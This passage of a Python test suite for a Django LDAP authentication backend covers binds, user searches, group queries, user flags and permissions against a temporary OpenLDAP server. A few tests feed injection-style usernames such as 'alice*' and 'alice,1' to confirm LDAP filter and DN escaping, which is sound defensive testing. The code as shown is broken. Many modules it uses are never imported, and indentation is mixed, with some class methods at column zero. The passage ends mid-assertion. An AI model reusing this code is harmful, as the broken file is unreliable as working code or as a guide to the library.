from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from django.test.client import RequestFactory
from django.test.utils import override_settings
from cool_django_auth_ldap.backend import LDAPBackend, ldap_error, populate_user
from cool_django_auth_ldap.config import (
GroupOfNamesType,
LDAPGroupQuery,
LDAPSearch,
LDAPSearchUnion,
MemberDNGroupType,
NestedMemberDNGroupType,
PosixGroupType,
)
from cool_django_auth_ldap.models import GroupMapping
from .models import TestUser
def get_backend():
    """Return the first authentication backend configured in Django settings."""
    return get_backends()[0]
def _override_settings(**settings):
    """Decorator variant of Django's ``override_settings``.

    Enables the settings override for the duration of one test method and
    registers the matching ``disable`` as a TestCase cleanup, so the override
    is undone even when the test fails.
    """
    def decorator(test_func):
        @functools.wraps(test_func)
        def wrapper(self, *args, **kwargs):
            override = override_settings(**settings)
            override.enable()
            self.addCleanup(override.disable)
            return test_func(self, *args, **kwargs)

        return wrapper

    return decorator
def spy_ldap(name):
    """
    Patch the python-ldap method. The patched method records all calls and
    passes execution to the original method.

    Usage: decorate a test method; the decorated test receives the recording
    MagicMock as its first extra argument, so it can assert on the arguments
    the LDAP backend actually passed to python-ldap.
    """
    # Grab the real method once, and create the mock that records each call.
    ldap_method = getattr(ldap.ldapobject.SimpleLDAPObject, name)
    ldap_mock = mock.MagicMock()

    @functools.wraps(ldap_method)
    def wrapped_ldap_method(self, *args, **kwargs):
        # Record the call, then delegate to the original so behaviour is
        # unchanged (a spy, not a stub).
        ldap_mock(*args, **kwargs)
        return ldap_method(self, *args, **kwargs)

    def decorator(test):
        @functools.wraps(test)
        def wrapped_test(self, *args, **kwargs):
            # Patch only for the duration of the test body.
            with mock.patch.object(
                ldap.ldapobject.SimpleLDAPObject, name, wrapped_ldap_method
            ):
                return test(self, ldap_mock, *args, **kwargs)

        return wrapped_test

    return decorator
@contextlib.contextmanager
def catch_signal(signal):
    """Connect a mock receiver to *signal* for the duration of the block.

    Yields the mock so the caller can assert on how the signal was sent; the
    receiver is always disconnected on exit, even if the body raises.
    """
    receiver = mock.Mock()
    signal.connect(receiver)
    try:
        yield receiver
    finally:
        signal.disconnect(receiver)
class LDAPTest(TestCase):
@classmethod
def configure_logger(cls):
logger = logging.getLogger("cool_django_auth_ldap")
formatter = logging.Formatter("LDAP auth - %(levelname)s - %(message)s")
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.CRITICAL)
    @classmethod
    def setUpClass(cls):
        # Start one throwaway OpenLDAP (slapd) server for the whole test
        # class and load the fixture entries from tests.ldif next to this
        # file. Torn down in tearDownClass.
        super().setUpClass()
        cls.configure_logger()
        here = os.path.dirname(__file__)
        cls.server = slapdtest.SlapdObject()
        cls.server.suffix = "o=test"
        cls.server.openldap_schema_files = [
            "core.schema",
            "cosine.schema",
            "inetorgperson.schema",
            "nis.schema",
        ]
        cls.server.start()
        with open(os.path.join(here, "tests.ldif")) as fp:
            ldif = fp.read()
        cls.server.ldapadd(ldif)
    @classmethod
    def tearDownClass(cls):
        # Stop the slapd server started in setUpClass.
        cls.server.stop()
        super().tearDownClass()
    def setUp(self):
        # Clear Django's cache between tests so cached LDAP results from one
        # test cannot leak into the next.
        super().setUp()
        cache.clear()
def test_options(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
CONNECTION_OPTIONS={ldap.OPT_REFERRALS: 0},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.ldap_user.connection.get_option(ldap.OPT_REFERRALS), 0)
def test_callable_server_uri(self):
request = RequestFactory().get("/")
cb_mock = mock.Mock(return_value=self.server.ldap_uri)
self._init_settings(
SERVER_URI=lambda request: cb_mock(request),
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
)
user_count = User.objects.count()
user = authenticate(request=request, username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
cb_mock.assert_called_with(request)
def test_deprecated_callable_server_uri(self):
self._init_settings(
SERVER_URI=lambda: self.server.ldap_uri,
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
)
user_count = User.objects.count()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
user = authenticate(username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
self.assertEqual(len(w), 1)
self.assertEqual(w[0].category, DeprecationWarning)
self.assertEqual(
str(w[0].message),
"Update AUTH_LDAP_SERVER_URI callable tests.tests.<lambda> to "
"accept a positional `request` argument. Support for callables "
"accepting no arguments will be removed in a future version.",
)
def test_simple_bind(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
def test_default_settings(self):
class MyBackend(LDAPBackend):
default_settings = {
"SERVER_URI": self.server.ldap_uri,
"USER_DN_TEMPLATE": "uid=%(user)s,ou=people,o=test",
}
backend = MyBackend()
user_count = User.objects.count()
user = backend.authenticate(None, username="alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
@_override_settings(
AUTHENTICATION_BACKENDS=[
"cool_django_auth_ldap.backend.LDAPBackend",
"django.contrib.auth.backends.ModelBackend",
]
)
def test_login_with_multiple_auth_backends(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
@_override_settings(
AUTHENTICATION_BACKENDS=[
"cool_django_auth_ldap.backend.LDAPBackend",
"django.contrib.auth.backends.ModelBackend",
]
)
def test_bad_login_with_multiple_auth_backends(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="invalid", password="i_do_not_exist")
self.assertIsNone(user)
def test_username_none(self):
self._init_settings()
user = authenticate(username=None, password="password")
self.assertIsNone(user)
@spy_ldap("simple_bind_s")
def test_simple_bind_escaped(self, mock):
""" Bind with a username that requires escaping. """
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user = authenticate(username="alice,1", password="password")
self.assertIsNone(user)
mock.assert_called_once_with("uid=alice\\,1,ou=people,o=test", "password")
def test_new_user_lowercase(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="Alice", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
def test_deepcopy(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user = authenticate(username="Alice", password="password")
user = deepcopy(user)
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_auth_custom_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"uid_number": "uidNumber"},
)
user = authenticate(username="Alice", password="password")
self.assertIsInstance(user, TestUser)
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_get_custom_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"uid_number": "uidNumber"},
)
backend = get_backend()
user = authenticate(username="Alice", password="password")
user = backend.get_user(user.id)
self.assertIsInstance(user, TestUser)
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_get_custom_field(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"uid_number": "uidNumber"},
USER_QUERY_FIELD="uid_number",
)
alice = TestUser.objects.create(identifier="abcdef", uid_number=1000)
user = authenticate(username="Alice", password="password")
self.assertIsInstance(user, TestUser)
self.assertEqual(user.pk, alice.pk)
def test_new_user_whitespace(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username=" alice", password="password")
user = authenticate(username="alice ", password="password")
self.assertIs(user.has_usable_password(), False)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), user_count + 1)
def test_simple_bind_bad_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="evil_alice", password="password")
self.assertIsNone(user)
self.assertEqual(User.objects.count(), user_count)
def test_simple_bind_bad_password(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user_count = User.objects.count()
user = authenticate(username="alice", password="bogus")
self.assertIsNone(user)
self.assertEqual(User.objects.count(), user_count)
def test_existing_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
User.objects.create(username="alice")
user_count = User.objects.count()
user = authenticate(username="alice", password="password")
# Make sure we only created one user
self.assertIsNotNone(user)
self.assertEqual(User.objects.count(), user_count)
def test_existing_user_insensitive(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
User.objects.create(username="alice")
user = authenticate(username="Alice", password="password")
self.assertIsNotNone(user)
self.assertEqual(user.username, "alice")
self.assertEqual(User.objects.count(), 1)
def test_convert_username(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
class MyBackend(LDAPBackend):
def ldap_to_django_username(self, username):
return "ldap_%s" % username
def django_to_ldap_username(self, username):
return username[5:]
backend = MyBackend()
user_count = User.objects.count()
user1 = backend.authenticate(None, username="alice", password="password")
user2 = backend.get_user(user1.pk)
self.assertEqual(User.objects.count(), user_count + 1)
self.assertEqual(user1.username, "ldap_alice")
self.assertEqual(user1.ldap_user._username, "alice")
self.assertEqual(user1.ldap_username, "alice")
self.assertEqual(user2.username, "ldap_alice")
self.assertEqual(user2.ldap_user._username, "alice")
self.assertEqual(user2.ldap_username, "alice")
def test_search_bind(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user_count = User.objects.count()
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
self.assertEqual(User.objects.count(), user_count + 1)
@spy_ldap("search_s")
def test_search_bind_escaped(self, mock):
""" Search for a username that requires escaping. """
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="alice*", password="password")
self.assertIsNone(user)
mock.assert_called_once_with(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=alice\\2a)", None
)
def test_search_bind_no_user(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uidNumber=%(user)s)"
)
)
user = authenticate(username="alice", password="password")
self.assertIsNone(user)
def test_search_bind_multiple_users(self):
self._init_settings(
USER_SEARCH=LDAPSearch("ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=*)")
)
user = authenticate(username="alice", password="password")
self.assertIsNone(user)
def test_search_bind_bad_password(self):
self._init_settings(
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
)
)
user = authenticate(username="alice", password="bogus")
self.assertIsNone(user)
def test_search_bind_with_credentials(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="password",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
user = authenticate(username="alice", password="password")
self.assertIsNotNone(user)
self.assertIsNotNone(user.ldap_user)
self.assertEqual(user.ldap_user.dn, "uid=alice,ou=people,o=test")
self.assertEqual(
dict(user.ldap_user.attrs),
{
"objectClass": [
"person",
"organizationalPerson",
"inetOrgPerson",
"posixAccount",
],
"cn": ["alice"],
"uid": ["alice"],
"userPassword": ["password"],
"uidNumber": ["1000"],
"gidNumber": ["1000"],
"givenName": ["Alice"],
"sn": ["Adams"],
"homeDirectory": ["/home/alice"],
},
)
def test_search_bind_with_bad_credentials(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
user = authenticate(username="alice", password="password")
self.assertIsNone(user)
def test_unicode_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
)
user = authenticate(username="dreßler", password="password")
self.assertIsNotNone(user)
self.assertEqual(user.username, "dreßler")
self.assertEqual(user.last_name, "Dreßler")
def test_cidict(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
user = authenticate(username="alice", password="password")
self.assertIsInstance(user.ldap_user.attrs, ldap.cidict.cidict)
def test_populate_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "Alice")
self.assertEqual(user.last_name, "Adams")
def test_populate_user_with_missing_attribute(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={
"first_name": "givenName",
"last_name": "sn",
"email": "mail",
},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "Alice")
self.assertEqual(user.last_name, "Adams")
self.assertEqual(user.email, "")
@mock.patch.object(LDAPSearch, "execute", return_value=None)
def test_populate_user_with_bad_search(self, mock_execute):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "")
self.assertEqual(user.last_name, "")
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_authenticate_with_buggy_setter_raises_exception(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "uid_number": "uidNumber"},
)
with self.assertRaisesMessage(Exception, "Oops..."):
authenticate(username="alice", password="password")
@_override_settings(AUTH_USER_MODEL="tests.TestUser")
def test_populate_user_with_buggy_setter_raises_exception(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "uid_number": "uidNumber"},
)
backend = get_backend()
with self.assertRaisesMessage(Exception, "Oops..."):
backend.populate_user("alice")
@spy_ldap("search_s")
def test_populate_with_attrlist(self, mock):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
USER_ATTRLIST=["*", "+"],
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
# lookup user attrs
mock.assert_called_once_with(
"uid=alice,ou=people,o=test", ldap.SCOPE_BASE, "(objectClass=*)", ["*", "+"]
)
def test_bind_as_user(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
BIND_AS_AUTHENTICATING_USER=True,
)
user = authenticate(username="alice", password="password")
self.assertEqual(user.username, "alice")
self.assertEqual(user.first_name, "Alice")
self.assertEqual(user.last_name, "Adams")
def test_signal_populate_user(self):
self._init_settings(USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test")
with catch_signal(populate_user) as handler:
user = authenticate(username="alice", password="password")
handler.assert_called_once_with(
signal=populate_user,
sender=LDAPBackend,
user=user,
ldap_user=user.ldap_user,
)
def test_auth_signal_ldap_error(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
def handle_ldap_error(sender, **kwargs):
raise kwargs["exception"]
with catch_signal(ldap_error) as handler:
handler.side_effect = handle_ldap_error
with self.assertRaises(ldap.LDAPError):
authenticate(username="alice", password="password")
handler.assert_called_once()
_args, kwargs = handler.call_args
self.assertEqual(kwargs["context"], "authenticate")
def test_populate_signal_ldap_error(self):
self._init_settings(
BIND_DN="uid=bob,ou=people,o=test",
BIND_PASSWORD="bogus",
USER_SEARCH=LDAPSearch(
"ou=people,o=test", ldap.SCOPE_SUBTREE, "(uid=%(user)s)"
),
)
backend = get_backend()
user = backend.populate_user("alice")
self.assertIsNone(user)
def test_no_update_existing(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
USER_ATTR_MAP={"first_name": "givenName", "last_name": "sn"},
ALWAYS_UPDATE_USER=False,
)
User.objects.create(username="alice", first_name="Alicia", last_name="Astro")
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertEqual(alice.first_name, "Alicia")
self.assertEqual(alice.last_name, "Astro")
self.assertEqual(bob.first_name, "Robert")
self.assertEqual(bob.last_name, "Barker")
def test_require_group(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
REQUIRE_GROUP="cn=active_gon,ou=groups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNotNone(alice)
self.assertIsNone(bob)
def test_no_new_users(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test", NO_NEW_USERS=True
)
user = authenticate(username="alice", password="password")
# No user was created.
self.assertIsNone(user)
self.assertEqual(0, User.objects.count())
def test_simple_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(alice.ldap_user), True)
def test_group_query_utf8(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
user = authenticate(username="dreßler", password="password")
query = LDAPGroupQuery("cn=dreßler_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(user.ldap_user), True)
def test_negated_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
query = ~LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(alice.ldap_user), False)
def test_or_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test") | LDAPGroupQuery(
"cn=bob_gon,ou=query_groups,o=test"
)
self.assertIs(query.resolve(alice.ldap_user), True)
self.assertIs(query.resolve(bob.ldap_user), True)
def test_and_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test") & LDAPGroupQuery(
"cn=mutual_gon,ou=query_groups,o=test"
)
self.assertIs(query.resolve(alice.ldap_user), True)
self.assertIs(query.resolve(bob.ldap_user), False)
def test_nested_group_query(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
query = (
LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test")
& LDAPGroupQuery("cn=mutual_gon,ou=query_groups,o=test")
) | LDAPGroupQuery("cn=bob_gon,ou=query_groups,o=test")
self.assertIs(query.resolve(alice.ldap_user), True)
self.assertIs(query.resolve(bob.ldap_user), True)
def test_require_group_as_group_query(self):
query = LDAPGroupQuery("cn=alice_gon,ou=query_groups,o=test") & LDAPGroupQuery(
"cn=mutual_gon,ou=query_groups,o=test"
)
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch(
"ou=query_groups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
REQUIRE_GROUP=query,
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNotNone(alice)
self.assertIsNone(bob)
def test_group_union(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearchUnion(
LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
LDAPSearch(
"ou=moregroups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
REQUIRE_GROUP="cn=other_gon,ou=moregroups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNone(alice)
self.assertIsNotNone(bob)
self.assertEqual(bob.ldap_user.group_names, {"other_gon"})
def test_nested_group_union(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearchUnion(
LDAPSearch(
"ou=groups,o=test", ldap.SCOPE_SUBTREE, "(objectClass=groupOfNames)"
),
LDAPSearch(
"ou=moregroups,o=test",
ldap.SCOPE_SUBTREE,
"(objectClass=groupOfNames)",
),
),
GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
REQUIRE_GROUP="cn=other_gon,ou=moregroups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNone(alice)
self.assertIsNotNone(bob)
self.assertEqual(bob.ldap_user.group_names, {"other_gon"})
def test_denied_group(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
DENY_GROUP="cn=active_gon,ou=groups,o=test",
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIsNone(alice)
self.assertIsNotNone(bob)
def test_group_dns(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
self.assertEqual(
alice.ldap_user.group_dns,
{
"cn=active_gon,ou=groups,o=test",
"cn=staff_gon,ou=groups,o=test",
"cn=superuser_gon,ou=groups,o=test",
"cn=nested_gon,ou=groups,o=test",
},
)
def test_group_names(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
)
alice = authenticate(username="alice", password="password")
self.assertEqual(
alice.ldap_user.group_names,
{"active_gon", "staff_gon", "superuser_gon", "nested_gon"},
)
def test_dn_group_membership(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
USER_FLAGS_BY_GROUP={
"is_active": LDAPGroupQuery("cn=active_gon,ou=groups,o=test"),
"is_staff": [
"cn=empty_gon,ou=groups,o=test",
"cn=staff_gon,ou=groups,o=test",
],
"is_superuser": "cn=superuser_gon,ou=groups,o=test",
},
)
alice = authenticate(username="alice", password="password")
bob = authenticate(username="bob", password="password")
self.assertIs(alice.is_active, True)
self.assertIs(alice.is_staff, True)
self.assertIs(alice.is_superuser, True)
self.assertIs(bob.is_active, False)
self.assertIs(bob.is_staff, False)
self.assertIs(bob.is_superuser, False)
def test_user_flags_misconfigured(self):
self._init_settings(
USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
GROUP_TYPE=MemberDNGroupType(member_attr="member"),
USER_FLAGS_BY_GROUP={
"is_active": LDAPGroupQuery("cn=active_gon,ou=groups,o=test"),
"is_staff": [],
"is_superuser": "cn=superuser_gon,ou=groups,o=test",
},
)
with self.assertRaises(ImproperlyConfigured):
authenticate(username="alice", password="password")
def test_posix_membership(self):
    """User flags resolve correctly with PosixGroupType membership."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=PosixGroupType(),
        USER_FLAGS_BY_GROUP={
            "is_active": "cn=active_px,ou=groups,o=test",
            "is_staff": "cn=staff_px,ou=groups,o=test",
            "is_superuser": "cn=superuser_px,ou=groups,o=test",
        },
    )
    alice = authenticate(username="alice", password="password")
    bob = authenticate(username="bob", password="password")
    self.assertIs(alice.is_active, True)
    self.assertIs(alice.is_staff, True)
    self.assertIs(alice.is_superuser, True)
    self.assertIs(bob.is_active, False)
    self.assertIs(bob.is_staff, False)
    self.assertIs(bob.is_superuser, False)
def test_nested_dn_group_membership(self):
    """Flags keyed on a parent group apply via NestedMemberDNGroupType."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=NestedMemberDNGroupType(member_attr="member"),
        USER_FLAGS_BY_GROUP={
            "is_active": "cn=parent_gon,ou=groups,o=test",
            "is_staff": "cn=parent_gon,ou=groups,o=test",
        },
    )
    alice = authenticate(username="alice", password="password")
    bob = authenticate(username="bob", password="password")
    self.assertIs(alice.is_active, True)
    self.assertIs(alice.is_staff, True)
    self.assertIs(bob.is_active, False)
    self.assertIs(bob.is_staff, False)
def test_posix_missing_attributes(self):
    """A user lacking posix attributes simply fails the group-based flag."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=PosixGroupType(),
        USER_FLAGS_BY_GROUP={"is_active": "cn=active_px,ou=groups,o=test"},
    )
    nobody = authenticate(username="nobody", password="password")
    self.assertIs(nobody.is_active, False)
def test_dn_group_permissions(self):
    """FIND_GROUP_PERMS grants Django permissions from LDAP group membership.

    alice is fetched through the backend (not authenticated), so permissions
    come purely from the LDAP group search plus _init_groups' Django groups.
    """
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
    )
    self._init_groups()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    alice = backend.get_user(alice.pk)
    self.assertEqual(
        backend.get_group_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
    self.assertEqual(
        backend.get_all_permissions(alice), {"auth.add_user", "auth.change_user"}
    )
    self.assertIs(backend.has_perm(alice, "auth.add_user"), True)
    self.assertIs(backend.has_module_perms(alice, "auth"), True)
def test_mapping_dn_group_permissions(self):
    """With USE_GROUP_MAPPING, permissions come from the mapped Django groups."""
    self._init_settings(
        USER_DN_TEMPLATE="uid=%(user)s,ou=people,o=test",
        GROUP_SEARCH=LDAPSearch("ou=groups,o=test", ldap.SCOPE_SUBTREE),
        GROUP_TYPE=MemberDNGroupType(member_attr="member"),
        FIND_GROUP_PERMS=True,
        USE_GROUP_MAPPING=True
    )
    self._init_groups_with_mapping()
    backend = get_backend()
    alice = User.objects.create(username="alice")
    alice = backend.get_user(alice.pk)
    self.assertEqual(
